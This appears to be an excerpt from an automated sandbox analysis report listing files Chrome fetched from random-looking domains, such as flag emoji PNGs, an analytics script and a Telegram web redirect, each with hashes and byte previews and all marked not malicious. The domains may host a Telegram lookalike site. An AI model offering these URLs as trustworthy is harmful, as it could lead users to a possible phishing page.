                                  Entropy (8bit):7.907700656757832
                                  Encrypted:false
                                  SSDEEP:96:mzCO87tGte0d3+XRgCEAGmVSgnFkKE97jf1k7gbgZnkkHSpcaIMA9:m58tGtDIzEdCS5jf1ugxkw7IV9
                                  MD5:98D433FC9D4292D721C6EA342C08F3A5
                                  SHA1:91C960197CF896B034C1904862E4FA1CDDCC43D4
                                  SHA-256:D86F5AC3BCF440249DB556BEBA31F0803C56B0D8E1707189D3A3552FEC2E2ADA
                                  SHA-512:CF0D089247B780646E32C87DC940FFBEAE8AAE68A1A90EE77E2E86EF8A395F941EA05E559F6B09BC7F8A929595CC029BD296AD8614E314FEC1AD0957E0F4AB75
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLQ47....iq....ck....ow.jr....rz.......fm. -a.$.......lt.3?...w..4......hp.4=....qx....iq....ho....qy.......fm.qy.......qx.7A..........ow........7..9..8..8..7..7..8..7..8..7..8..7..6..6..7..9.:..4.5.;.2.<..2.>.>..0.~?.v?..0.p?.l?.qy../.mu.cA.ir.dm.ZA.v1.fm.^h.Yd.bj.}-.T`.NB.^f.P\.Va.Zc.KX.Xa.NY.ES.GT.4H.@C.NX.R[.?O.3E.:J.>L.KUxk,.6E.BN.FQ.4E.2D.5F.3D.3C.1C.6D..D.(>.0A.1A.>J./@.,A.*E.->.DJ.6C.->.,=.*;.%C.+;.(9.,;.4A.(9. F.0>c\*.&7.%6..F.#4.#4.(7.2>.!2."3. 1.)7..-..0.!0.2<....!1..G..-WP(..-."1..+..,..&..)..)."/..'..$..&..).*3..%..$..#.."IE(]9..."..!..*..... ...........!...w.*......c#,;7&~.....1/&H"&z..u..('&&&&%%%$$$.%$"""W..!!!. :.........$!-.............$................."...5.........."...................."........ .............."...................~W....[tRNS.....%+5<=HKVZcccfllp~~~...................................................................S......oIDATx...m.\.}...9..;3;.....v...S...... ..D..T*i..@.V}.J..R..J...V.VJ[...IT....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4519
                                  Entropy (8bit):7.7909120779818455
                                  Encrypted:false
                                  SSDEEP:96:PJ/oNSHSZbiYY9uFdLSOgNI7iJjBBRl6EAYKI+PeUuF/zj+nc:R/ogy0YYgFYOr+lBBRQrPbuyc
                                  MD5:90751CE7388283D98AB31C9849E6061A
                                  SHA1:708F1057170CAF243AE055B9947DD38FB35F23DF
                                  SHA-256:0846CF4B72CC93709AA1D3712DE597B17DE093C04D7F2830E8882B1056919CA7
                                  SHA-512:34D1E396F2BA1A02B339EC56C56FBC676FB0E5B0EC28601FF57ADCA96EF6931D68BF95B4B9C51646164757E28C75E74F72CED9E68B7B90DF38329CECC6766E8C
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.U4.`;.i@.rE.wH zI(.Q&}N.mA.b6.\8.e=.V4.Q2.M0.I,.E(.@".<..>".A'.D'.E(.E(9P:.G+.K/.H+.C&.H,.K..df.?".>!.;..tv.qs.vx.y{.............kk.WW.bb.().01.78.NO.MN.LM.JK.HI.FG.DE.BC.@A.=>.;<.89.67.45.22./0~-.|+,z)*x'(v..v..nwx........................................................y|..#.)..,1X.i......irz..P..S. _#$j..S............................QT.[^.gi.oq.km.cf.Z\.QT.HL.CF.?B.IM.BF.KO.TW.\_.eh...U.wF.k?.b..2LL.FFn.Q+9:.89|45r11h11g/0f....rt.np.pr.oq.z|.{}.z{.z|.|~.}..su.xz.|~.y{.tv.np.fj.cf.[_.TX.NR.IM.JN.JN.JO.FK.EI.BF.?C.=A.:?.:>.7;.49.26.04..2.,0.*..(+.%).%).!%..........'*.."....)-.?B.JL.NQ.PS.02./2./2.36.59.8<.7;.37..2.. ............=B.7<.15.........e..u.........K/.\..\-.[-.Z-.Y).W).V'.T%.R#.P .N..K..I.}F.zE.xB.u@.s>.q;.n9.l7.k6.h5.c..]0.V,.K&.G$.G%.N......tRNS.d....................>O+......................................................................~w~...........................................ccV.v$Ce.....6.....................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4893
                                  Entropy (8bit):7.914495300335713
                                  Encrypted:false
                                  SSDEEP:96:gpJuwUPF/jaxbVye4RsfLI2zBV+wYaD66cbshyeKllGYay0O:F60e487BV+wYaFcbey1WYOO
                                  MD5:FED181690A39D4FB8FDFA30BD299B927
                                  SHA1:E5B8872A26C6F9C3B3AB47CC387E01C719A61F0D
                                  SHA-256:0404313239CA9E4D5033C6D551FBB4BC373F47459CA264E7089D4ADFFE72462C
                                  SHA-512:D58249D6B72262075D7A0CDD7B24C898C71F1D1C7D3FB2A9949F1B3B77DB62BBB36B9E67BB5503125295C1A3859D5D39F390EE5CDBA2A3522F28205265BEF882
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1f0.png
                                  Preview:.PNG........IHDR.....................PLTEGpLf........g........g.....f.......E[...*.7xf.....q.......`...g.....g........f........g........i........h.....`.........................................................................................................................................................................................................................y....t.....oz.cok...XeZy..JW.AOKl../7.1>.4D.3D.3D.1B.;X.2B.(0./@.0A..>.):5`..=h.+<.,<..>.(9dH..+;.&6.!3y?x.#4..$ML.8S..!2.)8.!2&V.&U...,$S.../.!1.Y.....'5!Q.'O...+.!0.O...,.U...$.)QY9{..).M.7D.. ...#.K...(."/..&#G..I...%.....(. 0..#.L..F...!..+..!..#....E.J0q....B...&....@..>..?....|.'.?.n.I.=.V$X.;..."....;..9..;..:.q.$x.!.,v.7..6w?$e....7..5..4..4.l...3..2..1..1.z.../../.r...+..,.f...,r.&..){`...&q....!d. `..R..i/.GG...ltRNS.....%76LLZbcbdgh}~~...............................................................................................`IDATx..[.\.Y..k.}..9.....uN...ik.I.(......R...T".....T...Dx.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (2576)
                                  Category:downloaded
                                  Size (bytes):2577
                                  Entropy (8bit):5.267238243787823
                                  Encrypted:false
                                  SSDEEP:48:Y3LHeQh3vX1wzpait6Nga0xA5G7sNaqxGcu7ui9h3aChy2XmPJKLyYaML:Yrxh3vKtaioNLG4sqxOZ3aCf0O
                                  MD5:6BF3115322CB61A0EBC7383B08053DEE
                                  SHA1:89DABEC6AFE44A46BA483ACACACF36EC30BAF4BB
                                  SHA-256:023D8E20A6DC800A6415A305418E11C27484C01AB373778D26D87E8B020961C4
                                  SHA-512:F6FFCDC250AA088DBFD871149ED8F3A63FE3CEC781958CD96D7FA4EF111ED199472223A8DA9411789781D469EBC3467497DC5E0E11DB3151D9F0C58ADC5F9C52
                                  Malicious:false
                                  Reputation:low
                                  URL:https://hu.bafanglaicai.app/script.js
                                  Preview:!function(){"use strict";(t=>{const{screen:{width:e,height:a},navigator:{language:r},location:n,localStorage:i,document:c,history:o}=t,{hostname:s,href:u}=n,{currentScript:l,referrer:d}=c;if(!l)return;const f="data-",m=l.getAttribute.bind(l),h=m(f+"website-id"),p=m(f+"host-url"),g=m(f+"tag"),y="false"!==m(f+"auto-track"),b="true"===m(f+"exclude-search"),v=m(f+"domains")||"",S=v.split(",").map((t=>t.trim())),w=`${(p||""||l.src.split("/").slice(0,-1).join("/")).replace(/\/$/,"")}/api/send`,N=`${e}x${a}`,T=/data-umami-event-([\w-_]+)/,A=f+"umami-event",x=300,O=t=>{if(t){try{const e=decodeURI(t);if(e!==t)return e}catch(e){return t}return encodeURI(t)}},U=t=>{try{const{pathname:e,search:a}=new URL(t);t=e+a}catch(t){}return b?t.split("?")[0]:t},j=()=>({website:h,hostname:s,screen:N,language:r,title:O(q),url:O(D),referrer:O(_),tag:g||void 0}),k=(t,e,a)=>{a&&(_=D,D=U(a.toString()),D!==_&&setTimeout(I,x))},E=()=>!h||i&&i.getItem("umami.disabled")||v&&!S.includes(s),L=async(t,e="event")=>{if(E()
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4726
                                  Entropy (8bit):7.932101573248386
                                  Encrypted:false
                                  SSDEEP:96:zr9YwXbBgTFoT4sA0POXZMsQIRU6EspoJJDnEM89wvfF9Rxo4ly6DqEO:zr9YcgTFoT4sADXWsQdeoJlo9wToItDc
                                  MD5:22D66BF276097E54E6AC51E6F8E1DEAC
                                  SHA1:2872984A0D4D9D9F4F93ED65B31AC10F27CAEBC3
                                  SHA-256:834804BAAE7EA1E2DDD91A2FB33917CB3BC47FD3453E6F3316D774698FB320E1
                                  SHA-512:4E73DBF05E23DCE02319A98C7D2956F2D93F9E0D96FCABD120F4C7AE80078A44A5143540119C2410E9C51240EB784ED658A535BCFCC81FA970908D86B21E9A8A
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.$L.//_x..ll....X8Xad.?%f...@%.A&.B&.C).=*.....u~.; .A&....?&e{..H.5Uq{~.dy.......=&f~..G,...c{.zr..oo.ff]y..nn.?c.kk.?#Zs..sq.ff...<Wxvh*.HH.:w..k.FF.8t..l.!!.&&..d.....g.6q..f.<<.DD.CC.>>."".00.99.@A.<y.....j.......>{....77..n.++.33.//.$$.d1.H..@}....K...`..b..m.E..33....,,.J..sA&.W.B~.((.4n.#K..\.g4..n.j8.*Y.-a.44....1h.4q.,,..V..S........[...".S....o<.))....55.E'....C...O..Z............!V.[8.b<.yC.nD.BB..t.M.O..Q.?#*V..}J.8..K.Q1Qm..h@.^/.//.V5..~.WX.8?..z....iCg...~....//...4_..uI zM.%O..s.bc....X)....%-.<.....M'......o.1ADc..MMWs..G:\...[.."..w........W.1..bT.&x.):.@@..n.<<.TH.S+....yP.FGe..&Kv.RI....H.......wu.y/}U..K...Y.|D.k....c....V...<6...hxs.....j..Q.^........M..=z..Nia.y/xj.."".Ah.EEy.a..lh.......Wt ..! .'&......yUI;L<.zzGnFS...0tRNS.~c..bc.,..Fb..h.9.:w............$.Ve...Wzl..}*/P.....IDATx...y\Ue...i,1.b.%K.KgZgT\........@...jI...8(*n...n(.-@.......&D*.....T..X...<...s..rA..._/^.~...<.{/.IMMMMMMMMMMMMM
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3917
                                  Entropy (8bit):7.901117391506987
                                  Encrypted:false
                                  SSDEEP:96:sU5ZTCGS0PmSRhdWLXcOhXE3eMp7YdYq1ZH+LZgKRQ7suulG6W4ehL:L5Z2GOSRhdEsOlEeMKWqL+LkFu2L
                                  MD5:BD7698AEB0A03008D4B3464618715677
                                  SHA1:C7618C44B6B469751FD82A6C23EED566FB872B40
                                  SHA-256:30DA17B907747EA168E0EB990F3D06AE5E07324BB739E6CA38626263ADD8D727
                                  SHA-512:627AC8F2F2D501ADD611B221B48D383D29DCF4B7ED47B132094C39E3F53299B4C9108D07283E682C209141DF9396C44CC937B07888813687C7B8DD11354107E9
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLi........j.....j.....h...........lT.*.j.....e.....<m_.U?w...........j.....j........g.....k........p".g.....c..q"................................................................................................................................................................................................o..~..W.....f.....D..F..2.....&.....%..C.{$..1.|".."..!.~I.p`.h..|*.z{t[..{.....y.eN.E5..w..}..x.D4.D4..v..r.8+.XD.=..N<..u.C3.B2..tG.b..t..s.@0.A1..r.?/..p.@0.=-..r.2$..n$.h..p.;+igN.>/..m.9).3$..k..k..i..l.7(.:,.6&..i..g..f.4$..e..h.M7.9+.(...e.2"..d..c.0 ..a.1":kN.6).....`.w].?,.,...^.+..,..~].. .~\.*..0". ..}\.3&.zY9aFiL4.'.OV>.'..mV.kU.%..+...".'..tUz>*.#..!..."....!..$..mP.......*..#..%.....(..cJ...~'....*L6. .z#..XAs#.....U>...y..o..{..i..p..c..~.|....atRNS.....%27HNbbcbgpx~~~~...............................................................................Y....IDATx..K.$.u.........1x0^..@.62h.2.?........W.o.6....xa0...4HH......
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5816
                                  Entropy (8bit):7.933511350825152
                                  Encrypted:false
                                  SSDEEP:96:7yHjgKRFLc9uAdcZmvy59qbzbwIeoRfsBz1cKTByiQMn3Cmn2VMI/uFYriwEzroQ:7yHjFFL9AdcZmvyDgzGXDlhtBcB/uaWp
                                  MD5:D19C6D41C584E34EC067CBE2E97F7364
                                  SHA1:392DF08B3B630F4A7C2D4AA160E678253DDA69BF
                                  SHA-256:B26893978BDBC02A0EC75626E1AE8208AD03F5D8572EACD0196CFC35BC59CAA9
                                  SHA-512:DC7C3056611FCEACC860541A636F8064830ACA1ABB70AF8F2258E47693F84912AD3D7CD865B3CD035F1443CA54B3C4D22EFB25A98F1D778E4EAAE971AEA74AE2
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL..Jzm...lzo.yn..rwm...d..r.v...#.zuj.~k..........BBb.....9..l........y{m.....u{q....wl....w.i{p.zx..o...{p..rfon..>@uj.pe..im.................................../..3..9..8..#........8..7..7..7..4..3..7..4..E.....5..1..1........4..-..+..*.....(..(..%..%....#.."..... ..!............................../............................"..)....$.....$.xv.&.D........P.......gg.w$....."....."..!..S....r...........OP.. .WV.X.......tu.q.].~..?2.~..x..y..t..1-liacc..65zo..&%....""Weqh`N.. .& XX........B9...." ...MQ.............FF..")......B@tI@N...o(T9:....... C..I.85q.......=..7.++x...$${(%g....*...vU.5..a.....m..c..l.._..S..G..8..d.WZ..F.I.K.'..X..2.l.4..4.........%..\..%..)....2.....U..$..#....%....I..0...FF..1..G.nm...&........0.....mB....-tRNS....%66KR`acfj|~~~~~~~.......................nf.|...:IDATx^..YK.@..ak`H0... ......Wf.t..{&...RZ{q.......C..B.!..B.!.P."..<@=.ulB,.P.(..$I..>...O.M....X....2.~o...l.%L%0...Z$!M.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):6640
                                  Entropy (8bit):7.948528564705358
                                  Encrypted:false
                                  SSDEEP:192:b11/Nw1tOM8hPTlj/KMt2HFVIAcn/SDHlrUB:bDQtSt12z6n/qUB
                                  MD5:0040734AA31EDCC366B505E5C2365C19
                                  SHA1:E6912D889B546260FFE803A1E043EB475B909E87
                                  SHA-256:FF1A55481357A6A8BBBD27DFA5D66978124E36F50FB7402F52030D0645FF9558
                                  SHA-512:28C2930B6958E2323A347D8BE1A1D142D2EA244060C6BB5216C80E46B78B943DBEFCCCE243666677FF6DF7A9EBAB4F0CD422E91EB1E0F5675F1D667B371327F7
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.9c.#L.bj.lt.qyy.&.lt.jrn..f...=O.mum. g...nv.pxf..h..f...jqd..i..b...gog...em.4=....4o.B~.4q.:v.7t.<x.H..?{.7r.F..@}.5r.8t.C..=z.L..>{.;v.A~.J..E..K..O..I..S..N..5p.Q..;y.D..G..:c.3m%Y."V.....Cv`...>m.E}.1h.9v.#K.-a.%P.*Y....D}r.%...m. .B..Zc....foZ+..lt....=..9b..*e0..LYg:....X.....o..}.$.#/.z.f......5{.a.t6$.aj.\e...."+.......X.......?E.......... *n*..Q^<......IT...:...IQ....U`.q....@k....*......R..19.=G...y...LV5.#nmp5b...*[..?K./={P>.veI.'...1.:Ai"YqE...xz~...Rx.e.ZN.M.1DnD)N.?)g.a..<..{bP..rKZ#+Y....3v..V`...x7T......Ol....#.f.R2)..3,U[*I\N(u.vu.n.....o.a...IH....H.$WVTs......K...}...hP}.......{.-Gw..M+L.O.H...`A`...wsNv-+e51...<8...?B9aB..;M{G@>..V^7[M[.g.d........Y.=lmZ.H"E.?1...KHo.C._&.a)G@i.1a.JC....B4.O&%,4..2m..kLq.....l\Q{.7"..*.v..,......tRNS.c~...Y].}8....:.g."....r.(..tk{....IDATx...]LSg..q7......C....(..~H.S..d.v.J][X..+n..V.i.U @..B.`......?.&~ ...S..B..../.w.].y.9...Jps^.?\@o....9....................8.06...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5249
                                  Entropy (8bit):7.8424072830626
                                  Encrypted:false
                                  SSDEEP:96:IsE6t1/uBoy+gChS1XJviQ/1LPRvsQfn7sgm+JPfQicDRqB+DoDbe:IsEA/1rgf1XliY1pPP7lm+JGqBrDbe
                                  MD5:BC672C5E26C05DE0D453CB60BC7EFB0F
                                  SHA1:CE0E37D6219122D9AFA315B353450B2FDADA1B0A
                                  SHA-256:825BCBB83DA5EFCCDC75B15F043BC2AE104DB3727CE399111678D560A56BEDB2
                                  SHA-512:59A7483709C5369B78937A61AA203084C5A95609E32143AF643631D9CBB785917D3656BC00439818C0CF91CDD514FD58B18A971E3039A1DAE86105D3E3D619DE
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ee-1f1f7.png
                                  Preview:.PNG........IHDR.....................PLTEGpLp/&j.vt..f.rw..l.xp.|u..p.|o.{w..x..x..x..p.}m.yi.uk.wl.xm.yw..a.mb.qV.fT.cW.iJ.]C.VN.]e.uY.kK.`B.X=.S5.K3.IZ.n0.I,.D,.BB.R0r=P.fJ.a4.M-.F*.C%.>#.</|B3pBKvVV|_<.U9.R6.O&.?!.:..8..6g.oB.[?.X..3%q7@.Y.Z$.^%.Y".i*.{-B.[..07.R2.Lv.....n.}U.kd.x.......................z............y........................................................................................................................................................DD.....&&.99...zz.."".[[....hh....ss..OO....//.%%.............................{{.gg.WW.aa.JJ...gg.pp.yy.pp.##.>>.LL....77. .mm.........................WW.55.LL.........................!!........................v..y...............$$.... ......y.....x..t..o..m..e..e..n..r..m..m..l..k..l..m..j..i....=f....tRNS...:Zev.I1...............................c........................~.....................................................c....................~~...................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4378
                                  Entropy (8bit):7.916447994029466
                                  Encrypted:false
                                  SSDEEP:96:K6xcTi9piE1Beg2KGq9CAsOtIHcNRQgkD/TDbzHItT0yKi8KqnC:SiTS0CstgcE/THzotuKqnC
                                  MD5:9A98C11B291C5D9D87F49FF4481022AE
                                  SHA1:17E20B036A8CD18532D64C6E752A38635F3A65AA
                                  SHA-256:39BA644834B625A9C5D9A36293F40197C513EBBDB4E374866113ACE4F292212E
                                  SHA-512:B55F7EC9FC2BC1EE49A5D3A8C771C91A2D085887767DD36FA8174B8DF33A3494B49620C02F637BC7642476561880CB6214D8EA19CE30EA17A64AB742F3F36189
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.$9.u..o~.r..t..n|.ix.o}.^m.fus.+.?R.mz.ix.ds.hw.fuN..'e.,i.E{.d..O.._..h..w.&f..g..d..g..r.!.pz.y.u.%.H..ixw.'.u.z.).*9x.'w.&e..v.&x.(x.'~.-t.$o....".%D.#B."B. @. ?..=..<..:..8..:.-L./N.1P.3Q.5T.8W.9X.9Y.:Y.:Z.:Z.:Y.#8.$9.'>..9..7..5..2J..\..V....3?..0.."|..u./z..n...3..4..5..1..#./]oD~EW...4..1...N..>..3...d............................n..>../.........r..y.....|..~..........".....".."..$..$..%..#......c..,C.3O....l....w....... 9qe.Wo.Wy.......l..y..u..s..p..m..k..i..g..b..\..T..K..H.....G.MC.O.Z......P..8X.7V.6U.5U.4T.2Q.0O..N.,L.*J.)Hn..t..}. ..)..-..9.'A."5.....0y.&..'..0..4.!<..2..0..-..)..$..".'F.jz.Rj.C`..L.2N./J.CZ.`t.=[Q..>w..'D.,I.7Q.5S.Tg.ar.+C.'?....'D.%C..>..;.r..8].#@..<..7h..^...Eb.<W.Ob..5.Zj.Yo.Ke."A.-H.'F.7V.F\..3]..`o.'B.v...8.*I.......3tRNS.c..6e.XI*mwUz{......U&..9b........~w....,Eb......~5.......IDATx^...N.P..Q..c..!@....!...k.;..^...\.$....Y.....?[...B.!..B.!...!$...D"Q..".r8,lF.,...N...US...1).O.A...6..yf>...h
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4489
                                  Entropy (8bit):7.825472341600636
                                  Encrypted:false
                                  SSDEEP:96:8jkRuxovJhcvbxcFwybMrKBpVbiHejOMxhr+Fjl0Xix:82RqvNwwprobief+Fayx
                                  MD5:59B367512A1E77F09BBDE297D480EE69
                                  SHA1:B83AACDD99F8D2F2BB39A21624932740E4D8596F
                                  SHA-256:252FE91C9648AC1A449C5972C2AFA916C21F8D7914E2DE36EE5F2536026389A7
                                  SHA-512:B56068E1C08C4E426429E28598299D2A3FFB0CB214E319A3DEB0980AAC6C8D186889455D76EB14E67FD70D14DECE76455C02A869CB88AD20217698F06BF0BB64
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLb..Nl.~..,Lr~..)Io{..*Jol..'Gm......(Hl...(Hm[}.z..3V.=e.$Di...r..&Gm}..%Gn4\.%O~Ch.'Hnz.....%EjYy.,Lp...u...Ns...#Bg...!Bgy...Nt{..+KoNq.....Ns!@f/Ot...............................y..p......g..}..r..v..y..l..f..m.._..t..y..]..a..d..]..\..\..\..\..m..u..[..e..[..^..Z..X..[..Z..Z..Z..Z..X..Z..s..X..X..V..Y..W..V..^..V..R..V..i..c..W..U..T..T..m..W..T..S..N..R..R..W..R..Q..d..J..]..Q..Q..O..O..O..S..O..N..e..F..M..L..S..M..L..K..M..K..B..W..[..J..I..J..O..H..H..J..H..G..\..;..O..F..E..G..F..D..C..F..D..C..H..C..B..K}.C~.G}.A~.B}.@}.D|.Tx.?|.Ez.?{.>{.@z.>z.<z.>y.Cx.=y.;y.=x.Fv.;x.;w.;w.>v.:v.:v.Es.9u.8u.9t.8t.7t.:s.>r.8s.Ko.7s.6s.7r.6r.Ap.6q.6q.@n.6o.?k.4l.3j.3i.7h.;f.8f.;e.;d.:c.1d.1b.8_.0_.4\.+[.4Y.+Z.,X.1T|+U.0Qw&Q.,Nu%O~%N}*Kr%Kx%Hq&Gm"Em Bh.>d.C$<....tRNS.......$$-15=@LNUXaccejmy{~~.......................................................................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):325
                                  Entropy (8bit):4.7974641880851365
                                  Encrypted:false
                                  SSDEEP:6:P46F+mmzQz9AmmNQg0OntoMhens3XhIKtgelEoiIg2mmLn:P468mmztx6g0C/Us3XuhelEoE2xL
                                  MD5:17773B57B87A678C98E26A7CAC72DF6C
                                  SHA1:7422857AA75EE81CABCEC2EED6C4A6168F363EE1
                                  SHA-256:375141F2D3F04C733276DBFF5D9208FF36B2DB6A64ABCEE723179AC24797974F
                                  SHA-512:28D9E1C2AF08154E653E2291DB46F4110EDBF9F5591192F8D695C8852F9C3C755D69DFB5A032A45F51E0A3FC9417F16C20D0772B1225CA9B85E5531E12FA8BFC
                                  Malicious:false
                                  Reputation:low
                                  Preview:const { pathname, hostname, href } = window.location;..if (pathname.startsWith('/z')) {. window.location.href = href.replace('/z', '/a');.}..if (. (hostname === 'weba.telegram.org' || hostname === 'webz.telegram.org') && !localStorage.getItem('tt-global-state').) {. window.location.href = 'https://web.telegram.org/a';.}.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4320
                                  Entropy (8bit):7.874669210931158
                                  Encrypted:false
                                  SSDEEP:96:dF6Z57OrXy9f0KrOdCTptDMvOjZNZemK/kLpVBkd727sGiv+uT:dst41gHuGZNZed/8QTxrT
                                  MD5:C5D4340E1BC12DBC4C2498A53D3039A3
                                  SHA1:FA71316BC0CA34A8A9D5808085A848956F56AEDC
                                  SHA-256:1C6E25DFFB5133153120F4C46A6F4B4D6259319A3B61B0CC92D61E9E03BCB29F
                                  SHA-512:D64B0B92FFE5DBAAD7A1C6A37D4D74513F48EA4C93AF843BAE5C772AB048EBD11F8E1742FE4EE391A55FCE2624146901D89D1591B0154B927896A586B04FE64E
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f1-1f1ee.png
                                  Preview:.PNG........IHDR.....................PLTEGpLh..j{.`..^o.g..fv.f..du.<Pxg....+./`hy.f..`q.s..:./..J`p.i..l}.eu.<Nuf..eu.Rc.Re.h..j{.g..aq.d..`p.iz.m."b..k|.`q.l."`....I..G..F..@.?.;.:..:..8..0..1..0..-jz..{*du..v,^p.[m..n).0;Xi.Si..3B.4E.4E.4DRg.mhB..;.3D.3C.1BQd..0A.1BKc..0@sb%..?.0A.->.6R.*:.,=D_..*;..>H]..#/]]F.(9.):?[..7Y.&7.+;.&7.;cBX..$59W.."3.#3.*8KV\t>lcU!.%5. 1>S|..0..%7R.2R.. 0...WC{....!0.&5..-1P...-KOE..+.!1.&6..,..*7L{+M.y/V0J...)1K}..*&K.&K...'..(&J.&J.%J.$J..!...&..,.#7%I.RG!$I.+H..L....(H...%#H.N8o.N."G...#..#"F..L...$7EW!E.)D{..!..!..$.!/.D...*....C..B......%....G..@..@.!?{K/^..)(>j.>.....A..=.{.'m.@A9.....;..:v..... N(F.:..8~q.$y. .6w.6}.5q...n. .7..4z.3g=!U.2..2yS.A"*h.1sk..{..4...0v./]u....q..uf...,\m...,r.+n.*pa...)m.)o.%..'j.'v.'m`...&k#.K.%j.$j.$g.!b ... ]..u..S..K..G.......c:.....tRNS.....,6CSUTccegw}~~.................................................................................................................-.Z.....IDATx.....e....<.<.rss.{...PH.."B.. "v
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5772
                                  Entropy (8bit):7.940245595800883
                                  Encrypted:false
                                  SSDEEP:96:/8QO342vD2NxWLG4P9dKMuxTfbCC6GfsxtJsG4TWVl6i1+GSH8XDUUnVodQ:JavibWLGI16TjCC6dO5xUn2dQ
                                  MD5:7F6E0E38D3BEEA170518BFDB4E8CED2D
                                  SHA1:C887AF0FEED3757DE345DF17FA24B5DB6D2BC879
                                  SHA-256:603F9D2764F4A96C835365829781230D19B7944CDBE89C12ECB21FB63C3A3688
                                  SHA-512:29784FBA587D574E14E50A13F6876DFD0EC22748D61BAB757C4583849C57DE6063ED71A1532FFE5F0EC0231CA7C7191C802F92EBB9815A7C87FCF4FABBF5B420
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLNIo..5ke...9qk...6..:j_...Lxn...4.....4mc...7OJp....KJ..6......kf...5...{<P.z..iygb...7mh...4.....7.emlg...8..1.JK.no.....%pj.e`......................................................................................k.............w..W..............u....i....P.....6.............`.S...}........8..%.......X.nn........`_.....I.u..}...G.LL..2xr..>>ztY....AAxr4.00.44.&%....++.""`Y.....&*....57...d\5......ZT_.....................RI?............E<C...p.J:0P2&w...1&v1%u0%t6-3/#t&&{."s..., q, o...*.o(.m&.k".Uc....r..T..M..c..M..E..^..?..J..d..Y..<..q..W..U..I..<..S..R..Q..4..P..[..J..N..E..?..V..O..9..5..-YR.A:m.ZY..[H?.?5v;3k`[. .\....#nC:z5*rQI.+!hWQ|&.]#.`.....1(gjf..._(.d......#.g... .e:/z..cKDv.QQ.........-"Z.MM..`...ed...zy.....[%.i..T`..k...-tRNS...!*9;NUcdehmvx{~~~~..........................)M....IDATx^..GO.0..qB.0..8...U.9.....p.N.`..K]............A.!..B.!..BH..jU..PU...(....5...R8aY..q.O..ce.i..5......A..!l.4! &
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5816
                                  Entropy (8bit):7.933511350825152
                                  Encrypted:false
                                  SSDEEP:96:7yHjgKRFLc9uAdcZmvy59qbzbwIeoRfsBz1cKTByiQMn3Cmn2VMI/uFYriwEzroQ:7yHjFFL9AdcZmvyDgzGXDlhtBcB/uaWp
                                  MD5:D19C6D41C584E34EC067CBE2E97F7364
                                  SHA1:392DF08B3B630F4A7C2D4AA160E678253DDA69BF
                                  SHA-256:B26893978BDBC02A0EC75626E1AE8208AD03F5D8572EACD0196CFC35BC59CAA9
                                  SHA-512:DC7C3056611FCEACC860541A636F8064830ACA1ABB70AF8F2258E47693F84912AD3D7CD865B3CD035F1443CA54B3C4D22EFB25A98F1D778E4EAAE971AEA74AE2
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f3-1f1fa.png
